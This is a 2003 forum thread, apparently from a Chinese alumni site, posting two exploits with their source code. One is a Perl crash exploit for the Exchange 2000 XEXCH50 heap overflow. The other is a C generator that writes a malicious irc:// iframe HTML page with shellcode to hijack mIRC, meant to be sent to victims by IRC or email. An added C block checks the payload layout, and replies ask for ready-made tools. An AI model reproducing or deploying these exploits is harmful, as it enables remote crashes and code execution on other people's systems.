Publishing two new vulnerabilities + overflow code

Posted 2003-11-18 22:56:00

Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)

#!/usr/bin/perl -w
##################
# ms03-046.pl
# This vulnerability allows a remote unauthenticated user to overwrite big chunks
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be
# just about any size, the actual code that crashes varies widely with each request.
# During the analysis process, numerous combinations of request size, concurrent
# requests, pre-allocations, and alternate trigger routes were examined and not a
# single duplicate of location and data offset was discovered. Hopefully the magic
# combination of data, size, and setup will be found to allow this bug to be reliably
# exploited.
# minor bugfix: look for 354 Send binary data
# by maple change

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;


if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }

usage();


sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "\nError establishing connection to SMTP service.\n";
        exit(0);
    }

    # harmless probe: length 2, flags 2; a vulnerable server answers 354
    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close ($s);
    $res = "" unless defined $res;   # server may drop the connection

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "\nThis server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "\nThis system is vulnerable: $host:$port\n";

    exit(0);
}


sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "\nError establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;
    $res = "" unless defined $res;

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "\nThis server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "\nSending massive heap-smashing string...\n";
    print $s ("META" x 16384);   # 64 KiB of filler

    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);

    exit(0);
}


sub usage
{
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);
}

# connect, check the banner looks like Exchange, and walk the session up to
# the point where XEXCH50 is accepted (HELO, MAIL FROM, RCPT TO)
sub SMTP
{
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp"
    ) || return(undef);

    my $r = <$s>;
    return undef if !$r;

    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "\nThis does not look like an exchange server: $r\n";
        return(undef);
    }

    print $s "HELO X\r\n";
    $r = <$s>;
    return undef if !$r;

    print $s "MAIL FROM: X\r\n";   # sender address is arbitrary
    $r = <$s>;
    return undef if !$r;

    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>;
    return undef if !$r;

    return($s);
}
Original poster | Posted 2003-11-18 22:57:00
mIRC v6.1 "IRC" protocol Remote Buffer overflow Exploit

/** remote mirc < 6.11 exploit by maple change
**
** TESTED ON: Windows XP (No SP, Dutch) Build: 2600.xpclient.010817-1148
**
** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
** nobody had written an exploit yet. So I decided to start writing one.
** Since this was my first time coding an exploit for windows, it took some
** research before I got the hang of it. (Ollydbg is much more confusing than GDB btw )
**
** This exploit (ab)uses the bug in irc:// URI handling. It contains a buffer
** overflow, and when more than 998 bytes are given EIP will be overwritten.
**
** At first I was thinking of a simple solution to get this exploitable. Since
** giving a URI with > 998 chars to someone on IRC is simply NOT done.
** Then I remembered the iframe-irc:// flaw found by uuuppzz [2]
**
** This exploit will write a malicious HTML file containing an iframe executing the
** irc:// address. So you can give this to anyone on IRC for example.
** The shellcode included only executes cmd.exe, because I don't want this to be
** a scriptkiddy util. But replacing the shellcode with your own is also possible.
** A 400-byte shellcode (bindshell etc.) easily fits in the buffer, but it may require
** some tweaking.
** After exiting cmd.exe mIRC will crash, so the shellcode is not 100% clean, but who cares
**
** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
** mIRC will start automatically when an irc:// is executed, so you can also send somebody
** an HTML email containing the evil HTML code. (only for poor clients like Outlook Express )
** :-)
**/



#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>   /* memset(), memcpy(), strlen() */


/* Stupid cmd.exe exec shellcode. hey! I r !evil */
unsigned char shellcode[] =
   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
   "\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
   "\x44\x80\xbf\x77"         //   0x77bf8044 <- address of system()
   "\xff\xd0";                //   call system()


char jmpback[] =
   "\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode


char buffer[1100], fstring[1300]; // heh, need to clean this up


int main(int argc, char *argv[]) {
   FILE *evil;

   (void)argc;
   (void)argv;

   fprintf(stdout, "---------------------------------------------\n"
         "mIRC < 6.11 remote exploit by maple change\n"
         "Exploit downloaded on 21resource.com\n"
         "---------------------------------------------\n\n");

   // NOPslides are cool (buffer[1099] stays 0 and terminates the string)
   memset(buffer, 0x90, sizeof(buffer) - 1);

   // place shellcode in buffer
   memcpy(buffer + 20, shellcode, strlen((char *)shellcode));

   // took this one from ntdll.dll (jmp esp); assumes a 32-bit long (Win32 build)
   *(long *)&buffer[994] = 0x77F4801C;

   // place jmpback shellcode in buffer, after a second NOP sled
   memcpy(buffer + 20 + strlen((char *)shellcode) + 1010, jmpback, strlen(jmpback));

   printf("[+] Evil buffer constructed\n");


   // open HTML file for writing
   if((evil = fopen("index.html", "a+")) != NULL) {

      // construct evil string: the whole buffer goes into the iframe's src
      sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);

      // write string to file
      fputs(fstring, evil);

      // close file
      fclose(evil);

      printf("[+] Evil HTML file written!\n");
      return(0);

   } else {
      // uh oh.. :/
      fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
      exit(1);
   }
}
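Two things worth checking before trusting a generator like the one above: that the bytes land where the comments say (shellcode at 20, return address at 994, backward JMP after a second sled) and that nothing in the payload breaks the wrapper it travels in, since sprintf drops it inside src="irc://..." in an HTML attribute, where a NUL, a double quote or a line break truncates or ends the string. The block below is an added example, not part of the original post: it rebuilds the same 1100-byte buffer, decodes the E9 rel32 displacement and scans for those bytes. The jump target is reported relative to the generator's own buffer; the post does not say what mIRC copies in front of the URI, so this is a layout check, not a claim about the live stack. The bad-byte set and the function names are assumptions.

```c
/* Layout and bad-byte check for the payload the exploit above writes into
 * index.html. Added example, not part of the original post: it rebuilds
 * the same 1100-byte buffer, decodes the trailing E9 rel32 and scans for
 * bytes that would not survive the <iframe src="irc://..."> wrapper.
 * The bad-byte set and the function names are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN   1100U
#define SC_OFFSET     20U            /* exploit: memcpy(buffer + 20, shellcode, ...) */
#define EIP_OFFSET    994U           /* exploit: *(long *)&buffer[994] = ... */
#define SLED2_LEN     1010U          /* exploit: gap between shellcode end and jmpback */
#define JMP_ESP_NTDLL 0x77F4801CUL   /* exploit's "jmp esp" in ntdll.dll */

/* same bytes as the exploit's shellcode[] and jmpback[] */
static const unsigned char k_shellcode[] = {
    0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
    0x8b,0xec,0x55,0x8b,0xec,0x68,0x65,0x78,0x65,0x20,0x68,0x63,0x6d,0x64,0x2e,
    0x8d,0x45,0xf8,0x50,0xb8,0x44,0x80,0xbf,0x77,0xff,0xd0
};
static const unsigned char k_jmpback[] = { 0xE9,0xCF,0xFB,0xFF,0xFF };

/* Offset at which the exploit places the backward JMP. */
size_t mirc_jmpback_offset(void)
{
    return SC_OFFSET + sizeof k_shellcode + SLED2_LEN;
}

/* Rebuild the exploit's buffer byte for byte; cap must be >= PAYLOAD_LEN.
 * Returns strlen() of the result, which is what sprintf("%s") will copy. */
size_t build_mirc_payload(unsigned char *buf, size_t cap)
{
    if (cap < PAYLOAD_LEN)
        return 0;
    memset(buf, 0x90, PAYLOAD_LEN - 1);
    buf[PAYLOAD_LEN - 1] = 0;
    memcpy(buf + SC_OFFSET, k_shellcode, sizeof k_shellcode);
    /* explicit little-endian store instead of the exploit's *(long *) cast,
     * so this check does not depend on sizeof(long) */
    buf[EIP_OFFSET + 0] = (unsigned char)(JMP_ESP_NTDLL & 0xff);
    buf[EIP_OFFSET + 1] = (unsigned char)((JMP_ESP_NTDLL >> 8) & 0xff);
    buf[EIP_OFFSET + 2] = (unsigned char)((JMP_ESP_NTDLL >> 16) & 0xff);
    buf[EIP_OFFSET + 3] = (unsigned char)((JMP_ESP_NTDLL >> 24) & 0xff);
    memcpy(buf + mirc_jmpback_offset(), k_jmpback, sizeof k_jmpback);
    return strlen((const char *)buf);
}

/* Decode "E9 rel32" at off and return its target as an offset from buf[0]
 * (negative means before the buffer). Sets *ok to 0 if no E9 is there. */
long decode_jmp_rel32(const unsigned char *buf, size_t off, int *ok)
{
    uint32_t raw;
    if (buf[off] != 0xE9) {
        *ok = 0;
        return 0;
    }
    raw = (uint32_t)buf[off + 1] | ((uint32_t)buf[off + 2] << 8)
        | ((uint32_t)buf[off + 3] << 16) | ((uint32_t)buf[off + 4] << 24);
    *ok = 1;
    return (long)off + 5 + (long)(int32_t)raw;
}

/* First index of a byte the %s / HTML-attribute wrapper cannot carry (NUL
 * ends the string, a double quote closes src="...", CR/LF end the line),
 * or -1 if the payload is clean. */
long first_bad_byte(const unsigned char *p, size_t n)
{
    static const unsigned char bad[] = { 0x00, '"', '\r', '\n' };
    for (size_t i = 0; i < n; i++)
        for (size_t j = 0; j < sizeof bad; j++)
            if (p[i] == bad[j])
                return (long)i;
    return -1;
}

/* Wrappers that build the payload internally, so a caller can query the
 * layout facts without managing the buffer. */
long mirc_payload_jmp_target(void)
{
    unsigned char buf[PAYLOAD_LEN];
    int ok;
    build_mirc_payload(buf, sizeof buf);
    return decode_jmp_rel32(buf, mirc_jmpback_offset(), &ok);
}

long mirc_payload_first_bad_byte(void)
{
    unsigned char buf[PAYLOAD_LEN];
    size_t n = build_mirc_payload(buf, sizeof buf);
    return first_bad_byte(buf, n);
}

int main(void)
{
    unsigned char buf[PAYLOAD_LEN];
    size_t n = build_mirc_payload(buf, sizeof buf);
    int ok;
    long target = decode_jmp_rel32(buf, mirc_jmpback_offset(), &ok);

    printf("payload strlen    : %zu (buffer %u, last byte is the terminator)\n", n, PAYLOAD_LEN);
    printf("return address at : %u = %02x %02x %02x %02x\n", EIP_OFFSET,
           buf[EIP_OFFSET], buf[EIP_OFFSET + 1], buf[EIP_OFFSET + 2], buf[EIP_OFFSET + 3]);
    printf("jmpback at        : %zu, %s target offset %ld\n", mirc_jmpback_offset(),
           ok ? "decoded" : "NOT an E9,", target);
    printf("first bad byte    : %ld\n", first_bad_byte(buf, n));
    return 0;
}
```

Run it after any change to the shellcode: a replacement payload that contains 0x22 or 0x0a is reported by index, and the decoded displacement shows at once whether a longer shellcode has pushed the backward JMP off the spot it was tuned for.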
Posted 2003-11-18 22:59:36
[emb7]
Posted 2003-11-19 10:06:34
Programming isn't my thing~ is there a ready-made tool?

[em13]
Original poster | Posted 2003-11-19 11:00:45
Take it and compile it yourself; you won't learn anything by looking for a free lunch.
Posted 2003-11-19 14:31:45
Just download ActivePerl and you're set. ^_^
Posted 2003-11-19 17:11:15
Found it already~~

[emb2][emb2]
Posted 2003-11-26 20:55:42
Quick question: what do you compile that jumble of stuff with??

I don't know how, teach me [emb12][emb12][emb13]
Posted 2003-11-29 22:12:08
Would someone do a good deed and compile it?
Posted 2003-11-30 09:31:33
I can't compile it, can anyone help me!!
Xijing Alumni Network (西京校友网), 陕ICP备11003551号-5